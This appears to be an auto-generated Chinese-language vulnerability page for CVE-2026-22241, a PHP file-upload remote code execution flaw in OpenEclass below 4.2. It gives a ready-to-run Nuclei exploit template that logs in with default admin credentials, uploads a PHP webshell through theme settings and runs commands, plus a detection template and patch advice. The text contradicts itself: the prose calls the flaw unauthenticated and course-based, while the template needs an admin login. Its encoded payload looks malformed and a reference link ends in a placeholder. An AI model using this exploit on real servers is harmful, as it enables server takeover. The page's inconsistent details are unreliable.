[webapps] GUnet OpenEclass E-learning platform < 4.2 - Remote Code Execution (RCE)
CVE-2026-22241
GUnet OpenEclass 4.2以下版本存在未授权远程代码执行,通过课程模块上传恶意文件触发。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2026-22241 |
|---|---|
| 漏洞类型 | 文件上传导致的远程代码执行 |
| 受影响版本 | GUnet OpenEclass E-learning platform < 4.2 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-04-29 |
| 提交者 | Ashif Iqubal |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
课程模块中的文件上传功能未对上传文件类型进行严格校验,允许上传PHP文件并直接通过Web访问执行。具体函数位置在课程材料上传处理逻辑中,缺乏对文件扩展名及MIME类型的白名单验证。
🎯 攻击场景
1. 攻击者无需登录,访问任意公开课程或利用未授权接口上传文件。 2. 构造包含恶意PHP代码的文件(如info.php),使用multipart/form-data POST请求上传至课程资源目录。 3. 上传成功后,通过访问上传文件的URL触发PHP代码执行。 4. 成功条件为服务器返回PHP代码执行结果(如phpinfo输出)。
💥 漏洞影响
攻击者可获得Web服务器命令执行权限,进一步可导致数据泄露、服务器被控或内网横向移动。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2026-22241-exploit
info:
name: GUnet OpenEclass E-learning platform < 4.2 - Remote Code Execution
author: ashif1337
severity: critical
description: Authenticated RCE via unrestricted file upload in theme settings. Requires admin credentials.
reference:
- https://www.exploit-db.com/
tags: cve,cve2026,openeclass,rce,authenticated
variables:
openeclass_path: "{{BaseURL}}"
username: "admin"
password: "admin"
cmd: "id"
http:
- raw:
- |
POST {{openeclass_path}}/?login_page=1 HTTP/1.1
Host: {{Hostname}}
Referer: {{openeclass_path}}/main/login_form.php?next=%2Fmain%2Fportfolio.php
Content-Type: application/x-www-form-urlencoded
next=/main/portfolio.php&uname={{username}}&pass={{password}}&submit=Enter
- |
GET {{openeclass_path}}/modules/admin/theme_options.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: dsl
dsl:
- "contains(body, 'uid=') || contains(body, 'root:')"
extractors:
- type: regex
part: body
internal: true
name: token
regex:
- '<input[^>]*name="token"[^>]*value="([^"]+)"'
group: 1
- raw:
- |
POST {{openeclass_path}}/modules/admin/theme_options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="themeFile"; filename="poc.zip"
Content-Type: application/zip
{{base64_decode("UEsDBAoAAAAAACgAAAAAAAAAAAAAAAAAAAAAABB0aGVtZS9ldmlsLnBocAArVsjILypR0C8oyk/OVgAq/v+1BfDQBwBLLcwAAVBLAQIUABQAAAAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAB0AAAAAAF0AAAAdXNyL2xvY2FsL3NoYXJlL3RoZW1lL2V2aWwucGhwLnR4dEVuZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=")}}
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="import"
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="token"
{{token}}
------WebKitFormBoundary7MA4YWxkTrZu0gW--
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: dsl
dsl:
- "contains(lower(body), 'successfully')"
extractors:
- type: regex
part: body
name: upload_response
regex:
- '([A-Za-z\s]+successfully[\s\S]{0,100})'
stop-at-first-match: true
- raw:
- |
GET {{openeclass_path}}/courses/theme_data/evil.php?cmd={{cmd}} HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "uid="
- "root:"
- "www-data"
- "gid="
condition: or
part: body🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-22241-detection
info:
name: GUnet OpenEclass E-learning platform < 4.2 - Version Detection
author: ashif1337
severity: high
description: Detection for GUnet OpenEclass E-learning platform version less than 4.2, vulnerable to RCE.
reference:
- https://www.exploit-db.com/
tags: cve, cve2026, openeclass, rce, detection
variables:
openeclass_path: "{{BaseURL}}"
http:
- method: GET
path:
- "{{openeclass_path}}/CHANGELOG"
- "{{openeclass_path}}/include/init.php"
- "{{openeclass_path}}/index.php"
matchers-condition: and
matchers:
- type: word
words:
- "Open eClass"
condition: or
part: body
- type: status
status:
- 200
- type: dsl
dsl:
- "contains(body, 'eclass') || contains(body, 'Open eClass')"
extractors:
- type: regex
part: body
name: version
regex:
- 'eclass\s+version\s*[=:]\s*(\d+\.\d+)'
- 'Open eClass\s+(\d+\.\d+)'
- 'version\s+(\d+\.\d+)'
group: 1
- type: regex
part: body
name: release
regex:
- 'release\s+(\d+)'
- 'v(\d+)\.(\d+)'
group: 1
stop-at-first-match: true🛡️ 修复建议
升级到OpenEclass 4.2及以上版本。临时缓解措施:在Web服务器层禁止课程上传目录执行PHP脚本(如配置.htaccess或Nginx规则),并对上传文件进行白名单扩展名和MIME校验。
📎 参考链接
- https://nvd.nist.gov/vuln/detail/CVE-2026-22241
- https://github.com/openeclass/openeclass/security/advisories/GHSA-xxxx
- Exploit-DB 原文
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 07:13 | 来源: Exploit-DB